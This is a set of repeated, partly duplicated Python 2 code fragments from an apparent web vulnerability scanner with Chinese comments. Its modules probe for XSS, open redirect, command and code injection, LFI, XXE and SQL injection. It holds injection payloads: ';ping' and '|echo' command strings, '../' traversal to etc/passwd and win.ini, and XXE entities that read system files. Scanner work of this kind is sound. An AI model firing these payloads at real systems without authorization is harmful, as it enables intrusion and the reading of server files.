def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(UrlRedirect, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'UrlRedirect' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False test_urls = ['http://www.baidu.com/', '//baidu.com'] self.payloads = test_urls # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_url_redirect, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(ReflectedXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'ReflectedXss' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False # 替换后的payload们 self.payloads = [replace_randomize(i) for i in PAYLOADS] # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_reflected_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 )
def __init__(self, kb, phantomjs_path, evaljs_path, logger, thread_num, filetype_whitelist, depth_limit, temp_dir_path): """ :kb: Universal KnowledgeBase :phantomjs_path: phantomjs路径 :evaljs_path: js脚本路径 :logger: 输出 :thread_num: 最大线程数 :filetype_whitelist:文件类型白名单 :depth_limit: 爬行深度限制 :temp_dir_path: 临时文件夹 """ super(SrcDownloader, self).__init__() self.kb = kb self.logger = logger self.executable = ' '.join([phantomjs_path, evaljs_path, '']) self.filetype_whitelist = filetype_whitelist self.depth_limit = depth_limit self.temp_dir_path = temp_dir_path self.exit_flag = False self.task_queue = [] self.seconds_wait = 1 # 检测新加进来的URL # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.download_page, logger=self.logger, owner='Downloader', start_index=0, seconds_wait=2 )
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CMDExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CMDExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_cmd_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) heads = ['', ';', '|'] bodys = [ 'ping -c 20 127.0.0.1', 'ping -n 20 127.0.0.1', 'echo 123456789098765432345678' ] self.results = ['123456789098765432345678'] self.payloads = [''.join([a, b]) for a in heads for b in bodys]
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(DomXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'DomXss' self.task_queue = [] self.visited = {} self.seconds_wait = 2 self.exit_flag = False # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_dom_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(INFOLeakage, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'INFOLeakage' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_INFO_LEAKAGE, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) self.payloads = pathlist
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(LFIScanner, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'LFIScanner' # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_lfi, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) heads = ['../' * 16] self.bodys = ['etc/passwd', 'windows/win.ini'] tails = ['', '\0', '%00', '?', '/' + './' * 2048] self.payloads = [ ''.join([a, b, c]) for a in heads for b in self.bodys for c in tails ] # 新加了两个xxe的payload,检测与之前一致 temp = [ '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini>]><foo>&xxe;</foo>' ] self.payloads.extend(temp) self.bodys.extend(temp) # 每一个body对应一个result,正则编译的结果 results = [ r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*', r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*' ] self.results = [ re.compile(rgx, re.DOTALL | re.IGNORECASE) for rgx in results ]
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CMDExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CMDExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_cmd_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) heads = ['', ';', '|'] bodys = ['ping -c 20 127.0.0.1', 'ping -n 20 127.0.0.1', 'echo 123456789098765432345678'] self.results = ['123456789098765432345678'] self.payloads = [''.join([a, b]) for a in heads for b in bodys]
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(INFOLeakage, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'INFOLeakage' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_INFO_LEAKAGE, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) self.payloads = pathlist
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(DomXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'DomXss' self.task_queue = [] self.visited = {} self.seconds_wait = 2 self.exit_flag = False # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_dom_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 )
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(UrlRedirect, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'UrlRedirect' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False test_urls = [ 'http://www.baidu.com/', '//baidu.com' ] self.payloads = test_urls # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_url_redirect, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 )
def __init__(self, kb, sqlmapapi_path, sqlmapapi_port, logger, cookie, sqlmapapi_addr, thread_num, temp_dir_path): """ :kb: Universal KnowledgeBase :sqlmapapi_path: 脚本的路径 :sqlmapapi_port: 监听的端口 :sqlmapapi_addr: 监听的地址,默认localhost :logger: 输出 :cookie: cookie,默认为空 :thread_num: 最大的线程数 :temp_dir_path: 临时文件夹 """ super(SqlScanner, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.temp_dir_path = temp_dir_path self.task_queue = [] self.seconds_wait = 2 # 检测新加进来的URL self.sqlmapapi_process = None self.exit_flag = False self.sqlmapapi_server = ''.join( ['http://', sqlmapapi_addr, ':', str(sqlmapapi_port)]) # autosqli的对象列表 self.autosqli_list = [None for i in xrange(thread_num)] self.autosqli_list_mutex = threading.Lock() # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_sql_injection, logger=self.logger, owner='SqlScanner', start_index=0, seconds_wait=1) # 开启sqlmapapi服务 self.start_sqlmapapi_server(sqlmapapi_path, sqlmapapi_addr, sqlmapapi_port)
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CODEExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CODEExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_CODE_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) PRINT_REPEATS = 5 PRINT_STRINGS = ( # PHP http://php.net/eval "echo str_repeat('%%s',%s);" % PRINT_REPEATS, # Perl http://perldoc.perl.org/functions/eval.html "print '%%s'x%s" % PRINT_REPEATS, # Python # http://docs.python.org/reference/simple_stmts.html#the-exec-statement "print '%%s'*%s" % PRINT_REPEATS, # ASP "Response.Write(new String(\"%%s\",%s))" % PRINT_REPEATS, ) self.payloads = PRINT_STRINGS
def __init__(self, kb, thread_num, dic_paths, logger): """ :kb: Universal KnowledgeBase :thread_num: 线程数量 :dic_paths: 字典路径列表 :logger: 输出 """ super(DirBurster, self).__init__() # 禁掉https证书的错误信息 requests.packages.urllib3.disable_warnings() self.kb = kb self.logger = logger # 读入目录字典 self.dic = [] for file_path in dic_paths: self.dic.extend(open(file_path, 'r').readlines()) for i in xrange(0, len(self.dic)): self.dic[i] = self.dic[i][1:-1] self.exit_flag = False self.visited_mutex = threading.Lock() self.task_queue = [] self.visited = {} self.seconds_wait = 2 # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.burst_url, logger=self.logger, owner='DirBurster', start_index=0, seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CODEExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CODEExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_CODE_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) PRINT_REPEATS = 5 PRINT_STRINGS = ( # PHP http://php.net/eval "echo str_repeat('%%s',%s);" % PRINT_REPEATS, # Perl http://perldoc.perl.org/functions/eval.html "print '%%s'x%s" % PRINT_REPEATS, # Python # http://docs.python.org/reference/simple_stmts.html#the-exec-statement "print '%%s'*%s" % PRINT_REPEATS, # ASP "Response.Write(new String(\"%%s\",%s))" % PRINT_REPEATS, ) self.payloads = PRINT_STRINGS
def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(LFIScanner, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'LFIScanner' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_lfi, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) heads = ['../' * 16] self.bodys = ['etc/passwd', 'windows/win.ini'] tails = ['', '\0', '%00', '?', '/' + './' * 2048] self.payloads = [''.join([a, b, c]) for a in heads for b in self.bodys for c in tails] # 新加了两个xxe的payload,检测与之前一致 temp = ['<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini>]><foo>&xxe;</foo>'] self.payloads.extend(temp) self.bodys.extend(temp) # 每一个body对应一个result,正则编译的结果 results = [ r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*', r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*'] self.results = [re.compile(rgx, re.DOTALL | re.IGNORECASE) for rgx in results]
def __init__(self, kb, thread_num, dic_paths, logger): """ :kb: Universal KnowledgeBase :thread_num: 线程数量 :dic_paths: 字典路径列表 :logger: 输出 """ super(DirBurster, self).__init__() # 禁掉https证书的错误信息 requests.packages.urllib3.disable_warnings() self.kb = kb self.logger = logger # 读入目录字典 self.dic = [] for file_path in dic_paths: self.dic.extend(open(file_path, 'r').readlines()) for i in xrange(0, len(self.dic)): self.dic[i] = self.dic[i][1:-1] self.exit_flag = False self.visited_mutex = threading.Lock() self.task_queue = [] self.visited = {} self.seconds_wait = 2 # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.burst_url, logger=self.logger, owner='DirBurster', start_index=0, seconds_wait=2 )
class DirBurster(object): """ 目录猜解,独立线程运行 """ def __init__(self, kb, thread_num, dic_paths, logger): """ :kb: Universal KnowledgeBase :thread_num: 线程数量 :dic_paths: 字典路径列表 :logger: 输出 """ super(DirBurster, self).__init__() # 禁掉https证书的错误信息 requests.packages.urllib3.disable_warnings() self.kb = kb self.logger = logger # 读入目录字典 self.dic = [] for file_path in dic_paths: self.dic.extend(open(file_path, 'r').readlines()) for i in xrange(0, len(self.dic)): self.dic[i] = self.dic[i][1:-1] self.exit_flag = False self.visited_mutex = threading.Lock() self.task_queue = [] self.visited = {} self.seconds_wait = 2 # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.burst_url, logger=self.logger, owner='DirBurster', start_index=0, seconds_wait=2 ) def engine_start(self): """ 从kb中取数据并进行目录猜解 """ self.log(['Engine started.']) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, DIR_BURSTER, url_count) if results is None: break # 读取结果保存到任务列表中,由dispather分发 if len(results) > 0: url_count += len(results) self.task_queue.extend([result[0] for result in results]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待所有线程结束 self.dispather.suicide() self.log(['Engine stopped.']) def burst_url(self, url, thread_no): """ 线程执行函数,对url进行目录猜解,保存到数据库 :url: 目标URL :thread_no: 当前线程号 """ path, domain = extract_path_domain(url) # 猜解目录,得到猜解成功地目录,保存到数据库 urls = self.parse_path(path, domain) self.kb.save_data(URL, [(url, 0, 200, 0) for url in urls]) def parse_path(self, path, domain): """ 递归猜解所有的路径 :path: 当前路径 :domain: 当前域名 :return: 猜解成功的路径列表 """ if len(path) == 0: return [] # 如果目录已存在就跳过,否则继续 full_path = domain + path self.visited_mutex.acquire() if self.visited.get(full_path) is not None: self.visited_mutex.release() return [] self.visited[full_path] = 0 self.visited_mutex.release() # 去掉一层目录,返回检测到的地址 upper = path[0:-1] i = upper.rfind('/') if i == -1: upper = '' else: upper = upper[0:i + 1] u_list = self.parse_path(upper, domain) u_list.extend(self.burst_single(full_path)) return u_list def burst_single(self, url): """ 对单个路径进行猜解 :url: 目标路径 :return: 猜解成功地目录列表 """ u_list = [] for x in self.dic: if self.exit_flag: break if (self.head_request(url + x)): u_list.append(url + x) return u_list def head_request(self, url): """ 发起head请求,目前只是判断了状态码 """ try: found = requests.head(url, verify=False).status_code == 200 except: found = False return found def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs): self.logger.debug('DirBurster', msgs)
class CODEExec(object): """ 代码执行扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CODEExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CODEExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_CODE_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) PRINT_REPEATS = 5 PRINT_STRINGS = ( # PHP http://php.net/eval "echo str_repeat('%%s',%s);" % PRINT_REPEATS, # Perl http://perldoc.perl.org/functions/eval.html "print '%%s'x%s" % PRINT_REPEATS, # Python # http://docs.python.org/reference/simple_stmts.html#the-exec-statement "print '%%s'*%s" % PRINT_REPEATS, # ASP "Response.Write(new String(\"%%s\",%s))" % PRINT_REPEATS, ) self.payloads = PRINT_STRINGS def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, CODE_EXEC, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] == 1 or result[1] == 2) ]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_CODE_exec(self, task, thread_no): """ 线程执行函数,检测单个URL上的代码执行漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_CODE_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data(CODE, (task[0], query[index][0], payload, 'CODE')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_CODE_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ return '%s' * 5 in src def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class DirBurster(object): """ 目录猜解,独立线程运行 """ def __init__(self, kb, thread_num, dic_paths, logger): """ :kb: Universal KnowledgeBase :thread_num: 线程数量 :dic_paths: 字典路径列表 :logger: 输出 """ super(DirBurster, self).__init__() # 禁掉https证书的错误信息 requests.packages.urllib3.disable_warnings() self.kb = kb self.logger = logger # 读入目录字典 self.dic = [] for file_path in dic_paths: self.dic.extend(open(file_path, 'r').readlines()) for i in xrange(0, len(self.dic)): self.dic[i] = self.dic[i][1:-1] self.exit_flag = False self.visited_mutex = threading.Lock() self.task_queue = [] self.visited = {} self.seconds_wait = 2 # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.burst_url, logger=self.logger, owner='DirBurster', start_index=0, seconds_wait=2) def engine_start(self): """ 从kb中取数据并进行目录猜解 """ self.log(['Engine started.']) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, DIR_BURSTER, url_count) if results is None: break # 读取结果保存到任务列表中,由dispather分发 if len(results) > 0: url_count += len(results) self.task_queue.extend([result[0] for result in results]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待所有线程结束 self.dispather.suicide() self.log(['Engine stopped.']) def burst_url(self, url, thread_no): """ 线程执行函数,对url进行目录猜解,保存到数据库 :url: 目标URL :thread_no: 当前线程号 """ path, domain = extract_path_domain(url) # 猜解目录,得到猜解成功地目录,保存到数据库 urls = self.parse_path(path, domain) self.kb.save_data(URL, [(url, 0, 200, 0) for url in urls]) def parse_path(self, path, domain): """ 递归猜解所有的路径 :path: 当前路径 :domain: 当前域名 :return: 猜解成功的路径列表 """ if len(path) == 0: return [] # 如果目录已存在就跳过,否则继续 full_path = domain + path self.visited_mutex.acquire() if self.visited.get(full_path) is not None: self.visited_mutex.release() return [] self.visited[full_path] = 0 self.visited_mutex.release() # 去掉一层目录,返回检测到的地址 upper = path[0:-1] i = upper.rfind('/') if i == -1: upper = '' else: upper = upper[0:i + 1] u_list = self.parse_path(upper, domain) u_list.extend(self.burst_single(full_path)) return u_list def burst_single(self, url): """ 对单个路径进行猜解 :url: 目标路径 :return: 猜解成功地目录列表 """ u_list = [] for x in self.dic: if self.exit_flag: break if (self.head_request(url + x)): u_list.append(url + x) return u_list def head_request(self, url): """ 发起head请求,目前只是判断了状态码 """ try: found = requests.head(url, verify=False).status_code == 200 except: found = False return found def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs): self.logger.debug('DirBurster', msgs)
class DomXss(object): """ 检测DOM XSS,检查页面中可控字段,无需发送payload """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(DomXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'DomXss' self.task_queue = [] self.visited = {} self.seconds_wait = 2 self.exit_flag = False # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_dom_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) def engine_start(self): """ 检测DOM XSS主函数 """ url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, XSS_SCANNER, url_count) if results is None: break # 所有的URL都添加到任务列表 if len(results) > 0: url_count += len(results) self.task_queue.extend(results) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() def check_on_dom_xss(self, task, thread_no): """ 线程执行函数,检查可能的DOM输出点,包括其他包含的JS :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ # 下载原页面,找到所有js src,访问并保存 src = {task[0]: send_common_request(task[0], task[1], self.cookie)} for js in _script_src_re.findall(src[task[0]]): # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) return # 访问js并且保存代码,重复不再爬取 # 这里有个问题是,如果是某个js中有输出点,那第一个被检查出来之后后面的就不管了 # 理论上不太可能是某个js中,就算是,至少也会爆出来一个。还算可以接受 link = url_process(js, task[0]) if self.visited.get(link) is not None: continue self.visited[link] = 0 src[js] = send_common_request(link, 0, '') # 检查所有的src中的输出点,存在则保存 for url in src.keys(): res = self.analyze_dom_result(src[url]) if res is not None: # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], '[FILE] ' + url, '[KEYWORD] ' + res], not DEBUG) self.kb.save_data(XSS, (task[0], url, res, 'DOM')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_dom_result(self, response): """ 检查源代码中是否有DOM的输出点 :response: 源代码 :return: 不存在则None,否则可控点的字符串 """ res = '' for function_re in JS_FUNCTION_CALLS: parameters = function_re.search(response) if parameters: for user_controlled in DOM_USER_CONTROLLED: if user_controlled in parameters.groups()[0]: res = '|'.join([res, user_controlled]) if len(res) > 0: return res[1:] else: return None def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class CMDExec(object): """ 命令执行扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CMDExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CMDExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_cmd_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) heads = ['', ';', '|'] bodys = [ 'ping -c 20 127.0.0.1', 'ping -n 20 127.0.0.1', 'echo 123456789098765432345678' ] self.results = ['123456789098765432345678'] self.payloads = [''.join([a, b]) for a in heads for b in bodys] def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, CMD_EXEC, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] == 1 or result[1] == 2) ]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_cmd_exec(self, task, thread_no): """ 线程执行函数,检测单个URL上的命令执行漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_cmd_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data(CMD, (task[0], query[index][0], payload, 'CMD')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_cmd_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ if 'echo' in payload: return self.results[0] in src and not ('echo ' + self.results[0]) in src #print time.time() - ori_time #通过延时来判读命令是否执行 return (time.time() - ori_time) > 19 def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class INFOLeakage(object): """ 信息泄露扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(INFOLeakage, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'INFOLeakage' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_INFO_LEAKAGE, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) self.payloads = pathlist def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, INFO_Leakage, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] == 1 or result[1] == 2) ]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_INFO_LEAKAGE(self, task, thread_no): """ 线程执行函数,检测单个URL上的信息泄露 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads.keys(): # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_INFO_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data(INFO, (task[0], query[index][0], payload, 'INFO')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_INFO_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ return self.payloads[payload] in src def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class LFIScanner(object): """ LFI扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(LFIScanner, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'LFIScanner' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_lfi, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) heads = ['../' * 16] self.bodys = ['etc/passwd', 'windows/win.ini'] tails = ['', '\0', '%00', '?', '/' + './' * 2048] self.payloads = [''.join([a, b, c]) for a in heads for b in self.bodys for c in tails] # 新加了两个xxe的payload,检测与之前一致 temp = ['<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini>]><foo>&xxe;</foo>'] self.payloads.extend(temp) self.bodys.extend(temp) # 每一个body对应一个result,正则编译的结果 results = [ 